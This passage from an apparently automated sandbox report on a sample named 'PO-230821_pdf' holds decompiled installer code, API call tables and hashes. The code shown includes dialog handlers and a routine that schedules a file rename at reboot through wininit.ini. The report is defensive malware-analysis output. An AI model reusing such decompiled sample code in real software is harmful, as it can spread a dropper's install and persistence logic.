                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                            				struct HWND__* _v28;
                                            				void* _v84;
                                            				void* _v88;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t34;
                                            				signed int _t36;
                                            				signed int _t38;
                                            				struct HWND__* _t48;
                                            				signed int _t67;
                                            				struct HWND__* _t73;
                                            				signed int _t86;
                                            				struct HWND__* _t91;
                                            				signed int _t99;
                                            				int _t103;
                                            				signed int _t117;
                                            				int _t118;
                                            				int _t122;
                                            				signed int _t124;
                                            				struct HWND__* _t127;
                                            				struct HWND__* _t128;
                                            				int _t129;
                                            				intOrPtr _t130;
                                            				long _t133;
                                            				int _t135;
                                            				int _t136;
                                            				void* _t137;
                                            
                                            				_t130 = _a8;
                                            				if(_t130 == 0x110 || _t130 == 0x408) {
                                            					_t34 = _a12;
                                            					_t127 = _a4;
                                            					__eflags = _t130 - 0x110;
                                            					 *0x423730 = _t34;
                                            					if(_t130 == 0x110) {
                                            						 *0x42a268 = _t127;
                                            						 *0x423744 = GetDlgItem(_t127, 1);
                                            						_t91 = GetDlgItem(_t127, 2);
                                            						_push(0xffffffff);
                                            						_push(0x1c);
                                            						 *0x421710 = _t91;
                                            						E004045C4(_t127);
                                            						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
                                            						 *0x42922c = E0040140B(4);
                                            						_t34 = 1;
                                            						__eflags = 1;
                                            						 *0x423730 = 1;
                                            					}
                                            					_t124 =  *0x40a39c; // 0xffffffff
                                            					_t136 = 0;
                                            					_t133 = (_t124 << 6) +  *0x42a280;
                                            					__eflags = _t124;
                                            					if(_t124 < 0) {
                                            						L36:
                                            						E00404610(0x40b);
                                            						while(1) {
                                            							_t36 =  *0x423730;
                                            							 *0x40a39c =  *0x40a39c + _t36;
                                            							_t133 = _t133 + (_t36 << 6);
                                            							_t38 =  *0x40a39c; // 0xffffffff
                                            							__eflags = _t38 -  *0x42a284;
                                            							if(_t38 ==  *0x42a284) {
                                            								E0040140B(1);
                                            							}
                                            							__eflags =  *0x42922c - _t136;
                                            							if( *0x42922c != _t136) {
                                            								break;
                                            							}
                                            							__eflags =  *0x40a39c -  *0x42a284; // 0xffffffff
                                            							if(__eflags >= 0) {
                                            								break;
                                            							}
                                            							_t117 =  *(_t133 + 0x14);
                                            							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                            							_push(0xfffffc19);
                                            							E004045C4(_t127);
                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                            							_push(0xfffffc1b);
                                            							E004045C4(_t127);
                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                            							_push(0xfffffc1a);
                                            							E004045C4(_t127);
                                            							_t48 = GetDlgItem(_t127, 3);
                                            							__eflags =  *0x42a2ec - _t136;
                                            							_v28 = _t48;
                                            							if( *0x42a2ec != _t136) {
                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                            								__eflags = _t117;
                                            							}
                                            							ShowWindow(_t48, _t117 & 0x00000008);
                                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                            							E004045E6(_t117 & 0x00000002);
                                            							_t118 = _t117 & 0x00000004;
                                            							EnableWindow( *0x421710, _t118);
                                            							__eflags = _t118 - _t136;
                                            							if(_t118 == _t136) {
                                            								_push(1);
                                            							} else {
                                            								_push(_t136);
                                            							}
                                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                            							__eflags =  *0x42a2ec - _t136;
                                            							if( *0x42a2ec == _t136) {
                                            								_push( *0x423744);
                                            							} else {
                                            								SendMessageW(_t127, 0x401, 2, _t136);
                                            								_push( *0x421710);
                                            							}
                                            							E004045F9();
                                            							E00406668(0x423748, E004040A6());
                                            							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                            							SetWindowTextW(_t127, 0x423748);
                                            							_push(_t136);
                                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                            							__eflags = _t67;
                                            							if(_t67 != 0) {
                                            								continue;
                                            							} else {
                                            								__eflags =  *_t133 - _t136;
                                            								if( *_t133 == _t136) {
                                            									continue;
                                            								}
                                            								__eflags =  *(_t133 + 4) - 5;
                                            								if( *(_t133 + 4) != 5) {
                                            									DestroyWindow( *0x429238);
                                            									 *0x422720 = _t133;
                                            									__eflags =  *_t133 - _t136;
                                            									if( *_t133 <= _t136) {
                                            										goto L60;
                                            									}
                                            									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                            									__eflags = _t73 - _t136;
                                            									 *0x429238 = _t73;
                                            									if(_t73 == _t136) {
                                            										goto L60;
                                            									}
                                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                            									_push(6);
                                            									E004045C4(_t73);
                                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                            									ScreenToClient(_t127, _t137 + 0x10);
                                            									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                            									_push(_t136);
                                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                            									__eflags =  *0x42922c - _t136;
                                            									if( *0x42922c != _t136) {
                                            										goto L63;
                                            									}
                                            									ShowWindow( *0x429238, 8);
                                            									E00404610(0x405);
                                            									goto L60;
                                            								}
                                            								__eflags =  *0x42a2ec - _t136;
                                            								if( *0x42a2ec != _t136) {
                                            									goto L63;
                                            								}
                                            								__eflags =  *0x42a2e0 - _t136;
                                            								if( *0x42a2e0 != _t136) {
                                            									continue;
                                            								}
                                            								goto L63;
                                            							}
                                            						}
                                            						DestroyWindow( *0x429238);
                                            						 *0x42a268 = _t136;
                                            						EndDialog(_t127,  *0x421f18);
                                            						goto L60;
                                            					} else {
                                            						__eflags = _t34 - 1;
                                            						if(_t34 != 1) {
                                            							L35:
                                            							__eflags =  *_t133 - _t136;
                                            							if( *_t133 == _t136) {
                                            								goto L63;
                                            							}
                                            							goto L36;
                                            						}
                                            						_push(0);
                                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                            						__eflags = _t86;
                                            						if(_t86 == 0) {
                                            							goto L35;
                                            						}
                                            						SendMessageW( *0x429238, 0x40f, 0, 1);
                                            						__eflags =  *0x42922c;
                                            						return 0 |  *0x42922c == 0x00000000;
                                            					}
                                            				} else {
                                            					_t127 = _a4;
                                            					_t136 = 0;
                                            					if(_t130 == 0x47) {
                                            						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                            					}
                                            					_t122 = _a12;
                                            					if(_t130 != 5) {
                                            						L8:
                                            						if(_t130 != 0x40d) {
                                            							__eflags = _t130 - 0x11;
                                            							if(_t130 != 0x11) {
                                            								__eflags = _t130 - 0x111;
                                            								if(_t130 != 0x111) {
                                            									goto L28;
                                            								}
                                            								_t135 = _t122 & 0x0000ffff;
                                            								_t128 = GetDlgItem(_t127, _t135);
                                            								__eflags = _t128 - _t136;
                                            								if(_t128 == _t136) {
                                            									L15:
                                            									__eflags = _t135 - 1;
                                            									if(_t135 != 1) {
                                            										__eflags = _t135 - 3;
                                            										if(_t135 != 3) {
                                            											_t129 = 2;
                                            											__eflags = _t135 - _t129;
                                            											if(_t135 != _t129) {
                                            												L27:
                                            												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                            												goto L28;
                                            											}
                                            											__eflags =  *0x42a2ec - _t136;
                                            											if( *0x42a2ec == _t136) {
                                            												_t99 = E0040140B(3);
                                            												__eflags = _t99;
                                            												if(_t99 != 0) {
                                            													goto L28;
                                            												}
                                            												 *0x421f18 = 1;
                                            												L23:
                                            												_push(0x78);
                                            												L24:
                                            												E0040459D();
                                            												goto L28;
                                            											}
                                            											E0040140B(_t129);
                                            											 *0x421f18 = _t129;
                                            											goto L23;
                                            										}
                                            										__eflags =  *0x40a39c - _t136; // 0xffffffff
                                            										if(__eflags <= 0) {
                                            											goto L27;
                                            										}
                                            										_push(0xffffffff);
                                            										goto L24;
                                            									}
                                            									_push(_t135);
                                            									goto L24;
                                            								}
                                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                                            								_t103 = IsWindowEnabled(_t128);
                                            								__eflags = _t103;
                                            								if(_t103 == 0) {
                                            									L63:
                                            									return 0;
                                            								}
                                            								goto L15;
                                            							}
                                            							SetWindowLongW(_t127, _t136, _t136);
                                            							return 1;
                                            						}
                                            						DestroyWindow( *0x429238);
                                            						 *0x429238 = _t122;
                                            						L60:
                                            						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                            							ShowWindow(_t127, 0xa);
                                            							 *0x425748 = 1;
                                            						}
                                            						goto L63;
                                            					} else {
                                            						asm("sbb eax, eax");
                                            						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                            							L28:
                                            							return E0040462B(_a8, _t122, _a16);
                                            						} else {
                                            							ShowWindow(_t127, 4);
                                            							goto L8;
                                            						}
                                            					}
                                            				}
                                            			}































                                            0x004040d0
                                            0x004040d7
                                            0x0040423e
                                            0x00404242
                                            0x00404246
                                            0x00404248
                                            0x0040424d
                                            0x00404258
                                            0x00404263
                                            0x00404268
                                            0x0040426a
                                            0x0040426c
                                            0x0040426f
                                            0x00404274
                                            0x00404282
                                            0x0040428f
                                            0x00404296
                                            0x00404296
                                            0x00404297
                                            0x00404297
                                            0x0040429c
                                            0x004042a2
                                            0x004042a9
                                            0x004042af
                                            0x004042b1
                                            0x004042f1
                                            0x004042f6
                                            0x004042fb
                                            0x004042fb
                                            0x00404300
                                            0x00404309
                                            0x0040430b
                                            0x00404310
                                            0x00404316
                                            0x0040431a
                                            0x0040431a
                                            0x0040431f
                                            0x00404325
                                            0x00000000
                                            0x00000000
                                            0x00404330
                                            0x00404336
                                            0x00000000
                                            0x00000000
                                            0x0040433f
                                            0x00404347
                                            0x0040434c
                                            0x0040434f
                                            0x00404355
                                            0x0040435a
                                            0x0040435d
                                            0x00404363
                                            0x00404368
                                            0x0040436b
                                            0x00404371
                                            0x00404379
                                            0x0040437f
                                            0x00404385
                                            0x00404389
                                            0x00404390
                                            0x00404390
                                            0x00404390
                                            0x0040439a
                                            0x004043ac
                                            0x004043b8
                                            0x004043bd
                                            0x004043c7
                                            0x004043cd
                                            0x004043cf
                                            0x004043d4
                                            0x004043d1
                                            0x004043d1
                                            0x004043d1
                                            0x004043e4
                                            0x004043fc
                                            0x004043fe
                                            0x00404404
                                            0x00404419
                                            0x00404406
                                            0x0040440f
                                            0x00404411
                                            0x00404411
                                            0x0040441f
                                            0x00404430
                                            0x00404446
                                            0x0040444d
                                            0x00404453
                                            0x00404457
                                            0x0040445c
                                            0x0040445e
                                            0x00000000
                                            0x00404464
                                            0x00404464
                                            0x00404466
                                            0x00000000
                                            0x00000000
                                            0x0040446c
                                            0x00404470
                                            0x00404495
                                            0x0040449b
                                            0x004044a1
                                            0x004044a3
                                            0x00000000
                                            0x00000000
                                            0x004044c9
                                            0x004044cf
                                            0x004044d1
                                            0x004044d6
                                            0x00000000
                                            0x00000000
                                            0x004044dc
                                            0x004044df
                                            0x004044e2
                                            0x004044f9
                                            0x00404505
                                            0x0040451e
                                            0x00404524
                                            0x00404528
                                            0x0040452d
                                            0x00404533
                                            0x00000000
                                            0x00000000
                                            0x0040453d
                                            0x00404548
                                            0x00000000
                                            0x00404548
                                            0x00404472
                                            0x00404478
                                            0x00000000
                                            0x00000000
                                            0x0040447e
                                            0x00404484
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040448a
                                            0x0040445e
                                            0x00404555
                                            0x00404561
                                            0x00404568
                                            0x00000000
                                            0x004042b3
                                            0x004042b3
                                            0x004042b6
                                            0x004042e9
                                            0x004042e9
                                            0x004042eb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004042eb
                                            0x004042b8
                                            0x004042bc
                                            0x004042c1
                                            0x004042c3
                                            0x00000000
                                            0x00000000
                                            0x004042d3
                                            0x004042db
                                            0x00000000
                                            0x004042e1
                                            0x004040e9
                                            0x004040e9
                                            0x004040ed
                                            0x004040f2
                                            0x00404101
                                            0x00404101
                                            0x00404107
                                            0x0040410e
                                            0x00404152
                                            0x00404158
                                            0x00404171
                                            0x00404174
                                            0x00404187
                                            0x0040418d
                                            0x00000000
                                            0x00000000
                                            0x00404193
                                            0x0040419e
                                            0x004041a0
                                            0x004041a2
                                            0x004041c1
                                            0x004041c1
                                            0x004041c4
                                            0x004041c9
                                            0x004041cc
                                            0x004041dc
                                            0x004041dd
                                            0x004041df
                                            0x00404215
                                            0x00404225
                                            0x00000000
                                            0x00404225
                                            0x004041e1
                                            0x004041e7
                                            0x00404200
                                            0x00404205
                                            0x00404207
                                            0x00000000
                                            0x00000000
                                            0x00404209
                                            0x004041f5
                                            0x004041f5
                                            0x004041f7
                                            0x004041f7
                                            0x00000000
                                            0x004041f7
                                            0x004041ea
                                            0x004041ef
                                            0x00000000
                                            0x004041ef
                                            0x004041ce
                                            0x004041d4
                                            0x00000000
                                            0x00000000
                                            0x004041d6
                                            0x00000000
                                            0x004041d6
                                            0x004041c6
                                            0x00000000
                                            0x004041c6
                                            0x004041ac
                                            0x004041b3
                                            0x004041b9
                                            0x004041bb
                                            0x00404591
                                            0x00000000
                                            0x00404591
                                            0x00000000
                                            0x004041bb
                                            0x00404179
                                            0x00000000
                                            0x00404181
                                            0x00404160
                                            0x00404166
                                            0x0040456e
                                            0x00404574
                                            0x00404581
                                            0x00404587
                                            0x00404587
                                            0x00000000
                                            0x00404110
                                            0x00404115
                                            0x00404121
                                            0x0040412a
                                            0x0040422b
                                            0x00000000
                                            0x00404149
                                            0x0040414c
                                            0x00000000
                                            0x0040414c
                                            0x0040412a
                                            0x0040410e

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                            • ShowWindow.USER32(?), ref: 00404121
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                            • DestroyWindow.USER32 ref: 00404160
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                            • GetDlgItem.USER32(?,?), ref: 00404198
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                            • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                            • GetDlgItem.USER32(?,00000002), ref: 00404268
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                            • GetDlgItem.USER32(?,00000003), ref: 00404379
                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                            • EnableWindow.USER32(?,?), ref: 004043AC
                                            • EnableWindow.USER32(?,?), ref: 004043C7
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                            • EnableMenuItem.USER32(00000000), ref: 004043E4
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID: H7B
                                            • API String ID: 1860320154-2300413410
                                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                            				intOrPtr _v8;
                                            				int _v12;
                                            				void* _v16;
                                            				struct HWND__* _t56;
                                            				signed int _t75;
                                            				signed short* _t76;
                                            				signed short* _t78;
                                            				long _t92;
                                            				int _t103;
                                            				signed int _t110;
                                            				intOrPtr _t113;
                                            				WCHAR* _t114;
                                            				signed int* _t116;
                                            				WCHAR* _t117;
                                            				struct HWND__* _t118;
                                            
                                            				if(_a8 != 0x110) {
                                            					if(_a8 != 0x111) {
                                            						L13:
                                            						if(_a8 != 0x4e) {
                                            							if(_a8 == 0x40b) {
                                            								 *0x421714 =  *0x421714 + 1;
                                            							}
                                            							L27:
                                            							_t114 = _a16;
                                            							L28:
                                            							return E0040462B(_a8, _a12, _t114);
                                            						}
                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                            						_t114 = _a16;
                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                            							_v12 = _t103;
                                            							_v16 = _t113;
                                            							_v8 = 0x428200;
                                            							if(_t103 - _t113 < 0x800) {
                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                            								_push(1);
                                            								E00404A32(_a4, _v8);
                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                            								_t114 = _a16;
                                            							}
                                            						}
                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                            							goto L28;
                                            						} else {
                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                            								SendMessageW( *0x42a268, 0x111, 1, 0);
                                            							}
                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                            								SendMessageW( *0x42a268, 0x10, 0, 0);
                                            							}
                                            							return 1;
                                            						}
                                            					}
                                            					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                            						goto L27;
                                            					} else {
                                            						_t116 =  *0x422720 + 0x14;
                                            						if(( *_t116 & 0x00000020) == 0) {
                                            							goto L27;
                                            						}
                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                            						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                            						E00404A0E();
                                            						goto L13;
                                            					}
                                            				}
                                            				_t117 = _a16;
                                            				_t75 =  *(_t117 + 0x30);
                                            				if(_t75 < 0) {
                                            					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                            				}
                                            				_t76 =  *0x42a298 + _t75 * 2;
                                            				_t110 =  *_t76 & 0x0000ffff;
                                            				_a8 = _t110;
                                            				_t78 =  &(_t76[1]);
                                            				_a16 = _t78;
                                            				_v16 = _t78;
                                            				_v12 = 0;
                                            				_v8 = E00404734;
                                            				if(_t110 != 2) {
                                            					_v8 = E004046FA;
                                            				}
                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                            				_push(0x22);
                                            				E004045C4(_a4);
                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                            				_push(0x23);
                                            				E004045C4(_a4);
                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                            				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                            				E004045F9(_t118);
                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                            				_t92 =  *( *0x42a270 + 0x68);
                                            				if(_t92 < 0) {
                                            					_t92 = GetSysColor( ~_t92);
                                            				}
                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                            				 *0x421714 = 0;
                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                            				 *0x421714 = 0;
                                            				return 0;
                                            			}


















                                            0x00404795
                                            0x004048c2
                                            0x0040491f
                                            0x00404923
                                            0x004049f0
                                            0x004049f2
                                            0x004049f2
                                            0x004049f8
                                            0x004049f8
                                            0x004049fb
                                            0x00000000
                                            0x00404a02
                                            0x00404931
                                            0x00404937
                                            0x00404941
                                            0x0040494c
                                            0x0040494f
                                            0x00404952
                                            0x0040495d
                                            0x00404960
                                            0x00404967
                                            0x00404974
                                            0x00404985
                                            0x0040498b
                                            0x00404993
                                            0x004049a1
                                            0x004049a7
                                            0x004049a7
                                            0x00404967
                                            0x004049b1
                                            0x00000000
                                            0x004049bc
                                            0x004049c0
                                            0x004049d0
                                            0x004049d0
                                            0x004049d6
                                            0x004049e2
                                            0x004049e2
                                            0x00000000
                                            0x004049e6
                                            0x004049b1
                                            0x004048cd
                                            0x00000000
                                            0x004048df
                                            0x004048e4
                                            0x004048ea
                                            0x00000000
                                            0x00000000
                                            0x00404913
                                            0x00404915
                                            0x0040491a
                                            0x00000000
                                            0x0040491a
                                            0x004048cd
                                            0x0040479b
                                            0x0040479e
                                            0x004047a3
                                            0x004047b4
                                            0x004047b4
                                            0x004047bc
                                            0x004047bf
                                            0x004047c3
                                            0x004047c6
                                            0x004047ca
                                            0x004047cd
                                            0x004047d0
                                            0x004047d3
                                            0x004047da
                                            0x004047dc
                                            0x004047dc
                                            0x004047e6
                                            0x004047f3
                                            0x004047fd
                                            0x00404802
                                            0x00404805
                                            0x0040480a
                                            0x00404821
                                            0x00404828
                                            0x0040483b
                                            0x0040483e
                                            0x00404852
                                            0x00404859
                                            0x0040485e
                                            0x00404863
                                            0x00404863
                                            0x00404871
                                            0x0040487f
                                            0x00404891
                                            0x00404896
                                            0x004048a6
                                            0x004048a8
                                            0x00000000

                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                            • GetSysColor.USER32(?), ref: 00404863
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                            • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                            • SendMessageW.USER32(00000000), ref: 00404906
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                            • SetCursor.USER32(00000000), ref: 00404985
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                            • SetCursor.USER32(00000000), ref: 004049A1
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: Fosklcks$N
                                            • API String ID: 3103080414-589444622
                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004062AE(void* __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				long _t12;
                                            				long _t24;
                                            				char* _t31;
                                            				int _t37;
                                            				void* _t38;
                                            				intOrPtr* _t39;
                                            				long _t42;
                                            				WCHAR* _t44;
                                            				void* _t46;
                                            				void* _t48;
                                            				void* _t49;
                                            				void* _t52;
                                            				void* _t53;
                                            
                                            				_t38 = __ecx;
                                            				_t44 =  *(_t52 + 0x14);
                                            				 *0x426de8 = 0x55004e;
                                            				 *0x426dec = 0x4c;
                                            				if(_t44 == 0) {
                                            					L3:
                                            					_t2 = _t52 + 0x1c; // 0x4275e8
                                            					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                            						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                            						_t53 = _t52 + 0x10;
                                            						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                            						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                            						_t48 = _t12;
                                            						 *(_t53 + 0x18) = _t48;
                                            						if(_t48 != 0xffffffff) {
                                            							_t42 = GetFileSize(_t48, 0);
                                            							_t6 = _t37 + 0xa; // 0xa
                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                            							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                            								L18:
                                            								return CloseHandle(_t48);
                                            							} else {
                                            								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                            									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                            									if(_t49 == 0) {
                                            										_t48 =  *(_t53 + 0x18);
                                            										L16:
                                            										_t24 = _t42;
                                            										L17:
                                            										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                            										SetFilePointer(_t48, 0, 0, 0);
                                            										E0040620A(_t48, _t46, _t42 + _t37);
                                            										GlobalFree(_t46);
                                            										goto L18;
                                            									}
                                            									_t39 = _t46 + _t42;
                                            									_t31 = _t39 + _t37;
                                            									while(_t39 > _t49) {
                                            										 *_t31 =  *_t39;
